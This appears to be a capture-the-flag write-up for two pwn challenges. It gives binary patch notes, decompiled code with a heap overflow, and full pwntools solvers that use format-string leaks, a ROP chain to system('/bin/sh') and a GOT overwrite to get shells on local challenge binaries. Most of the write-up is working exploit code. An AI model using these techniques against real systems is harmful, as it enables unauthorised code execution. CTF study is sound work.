tsune Help

acsc 2025

byte challenge

stage 1

jz short loc_14BA-> jnz short loc_14BA

Screenshot_20250817_171222.png

stage 2

jnz short loc_1548-> jz short loc_1548

Screenshot_20250817_171328.png

stage 3

jz short loc_15FB-> jz short loc_15FB

Screenshot_20250817_171417.png

stage 4

mov rsi, rax-> mov rsi, rbp

Screenshot_20250817_171118.png

solver 1

from pwn import * import sys e = ELF("prob_patched",checksec=False) libc = ELF("libc.so.6",checksec=False) ld = ELF("ld-linux-x86-64.so.2",checksec=False) nc = "nc 127.0.0.1 9999" if "nc" in nc: HOST = nc.split(" ")[1] PORT = int(nc.split(" ")[2]) if "http" in nc: from urllib.parse import urlparse HOST = urlparse(nc).hostname PORT = urlparse(nc).port dbg = 1 g_script = """ #set max-visualize-chunk-size 0x300 """ context.binary = e if len(sys.argv) > 1: io = remote(host=HOST,port=PORT) else: io = e.process() if dbg: gdb.attach(io,g_script) s = lambda b: io.send(b) sa = lambda a,b: io.sendafter(a,b) sl = lambda b: io.sendline(b) sla = lambda a,b: io.sendlineafter(a,b) r = lambda : io.recv() ru = lambda b:io.recvuntil(b,drop=True) rl = lambda : io.recvline() pu32= lambda b : u32(b.ljust(4,b"\0")) pu64= lambda b : u64(b.ljust(8,b"\0")) hlog= lambda i : print(f"[*]{hex(i)}") shell = lambda : io.interactive() payload = b"" def rst():global payload;payload = b"";log.info("***PAYLOAD RESET***") def pay64(adr:int):global payload;payload += p64(adr) def paybyte(data):global payload;payload += data if type(data) == bytes else data.encode() #%15$p 0x5555555556b1 #%41$p 0x00007ffff7c29e40 sl(b"tsune %15$p %16$p %41$p tsune") #tsune 0x5555555556b1 0x7fffffffdc39 0x7ffff7c29e40 tsune ru(b"tsune") leaks = ru(b"tsune").decode().split(" ") print(f"{leaks=}") e_leak = int(leaks[1],16) e.address = e_leak - (0x5555555556b1 - 0x0000555555554000) hlog(e.address) stk_leak = int(leaks[2],16) l_leak = int(leaks[3],16) libc.address = l_leak - (0x7ffff7c29e40 - 0x00007ffff7c00000) hlog(libc.address) sl(hex(e.address).encode()+b" "+hex(0x5000).encode()) # stage 1 sl(str(0x149f).encode()) sl(str(0x75).encode()) # stage 2 sl(str(0x152d).encode()) sl(str(0x74).encode()) # stage 3 sl(str(0x15e0).encode()) sl(str(0x75).encode()) # stage 4 sl(str(0x1633).encode()) sl(str(0xee).encode()) rst() pay64(stk_leak-0x8-0x100) pay64(libc.address + 0x0010e066) pay64(libc.address + 0x001bbea1) pay64(next(libc.search(b"/bin/sh\0"))) pay64(libc.sym["system"]) sl(payload) shell()

book manager

heap overflow @ sub_40191d

int sub_40191D() { int v1; // [rsp+8h] [rbp-8h] BYREF unsigned int v2; // [rsp+Ch] [rbp-4h] BYREF printf("Book Index: "); __isoc99_scanf("%d", &v2); if ( v2 > 0xA || !qword_4040C0[v2] ) return puts("Invalid Index!"); sub_401373(1); printf("Which Info?: "); __isoc99_scanf("%d", &v1); printf("Your Data: "); if ( v1 > 4 ) return puts("Invalid Option!"); if ( v1 > 2 ) return __isoc99_scanf("%s", *(_QWORD *)(8LL * v1 - 8 + qword_4040C0[v2]));// pwn point return __isoc99_scanf("%lld", 8LL * v1 - 8 + qword_4040C0[v2]); }

overwriting string pointer to .got.plt

Screenshot_20250817_172124.png

leaking libc address from 0x0000000000404028, falsifying puts@got.plt, puts("/bin/sh") to win a shell.

free | 0x0000004010b0 | 0x000000404018 | 0x7f633f364290 <system> puts | 0x0000004010c0 | 0x000000404020 | 0x7f633f364290 <system> printf | 0x0000004010d0 | 0x000000404028 | 0x7f633f373c90 <printf> memset | 0x0000004010e0 | 0x000000404030 | 0x7f633f49dd30 read | 0x0000004010f0 | 0x000000404038 | 0x7f633f4201e0 <read> malloc | 0x000000401100 | 0x000000404040 | 0x7f633f3ac0e0 <malloc> setvbuf | 0x000000401110 | 0x000000404048 | 0x7f633f396ce0 <setvbuf> __isoc99_scanf | 0x000000401120 | 0x000000404050 | 0x7f633f3750b0 <__isoc99_scanf>

solver 2

from pwn import * import sys e = ELF("prob",checksec=False) libc = ELF("libc-2.31.so",checksec=False) ld = ELF("ld-2.31.so",checksec=False) nc = "nc 127.0.0.1 5235" if "nc" in nc: HOST = nc.split(" ")[1] PORT = int(nc.split(" ")[2]) if "http" in nc: from urllib.parse import urlparse HOST = urlparse(nc).hostname PORT = urlparse(nc).port dbg = 1 g_script = """ #set max-visualize-chunk-size 0x300 """ context.binary = e if len(sys.argv) > 1: io = remote(host=HOST,port=PORT) else: io = e.process() if dbg: gdb.attach(io,g_script) s = lambda b: io.send(b) sa = lambda a,b: io.sendafter(a,b) sl = lambda b: io.sendline(b) sla = lambda a,b: io.sendlineafter(a,b) r = lambda : io.recv() ru = lambda b:io.recvuntil(b,drop=True) rl = lambda : io.recvline() pu32= lambda b : u32(b.ljust(4,b"\0")) pu64= lambda b : u64(b.ljust(8,b"\0")) hlog= lambda i : print(f"[*]{hex(i)}") shell = lambda : io.interactive() payload = b"" def rst():global payload;payload = b"";log.info("***PAYLOAD RESET***") def pay64(adr:int):global payload;payload += p64(adr) def paybyte(data):global payload;payload += data if type(data) == bytes else data.encode() def register(no,price,author,title): log.info("register") ru(b"Menu: ") sl(b"1") sl(no) sl(price) sl(author) sl(title) def info(idx): log.info("info") ru(b"Menu: ") sl(b"2") sl(str(idx).encode()) ru(b"Info?: ") sl(b"0") return ru(b"1. Register") def delete(idx): log.info("delete") ru(b"Menu: ") sl(b"3") sl(str(idx).encode()) def edit(idx,info,content): log.info("edit") ru(b"Menu: ") sl(b"4") sl(str(idx).encode()) sl(str(info).encode()) sl(content) sl(b"/bin/sh\0") register(b"0",b"0",b"/bin/sh",b"AAAAAAAA") register(b"0",b"0",b"tsune",b"BBBBBBBB") rst() paybyte(b"C"*0x30) pay64(0) pay64(0x31) pay64(0x0) pay64(0x0) pay64(0x00404018) pay64(0x00404028) edit(0,4,payload) res = info(1) print(f"{res=}") res = res.split(b"Book Title : ")[1] res = res.split(b"\n")[0] print(f"{res=}") res = pu64(res) print(f"{hex(res)=}") libc.address = res - (0x7e82a6371c90 - 0x00007e82a6310000) hlog(libc.address) rst() pay64(libc.sym["system"]) pay64(libc.sym["system"]) edit(1,3,payload[:15]) delete(0) shell()
Last modified: 17 August 2025
GreyCTF 2025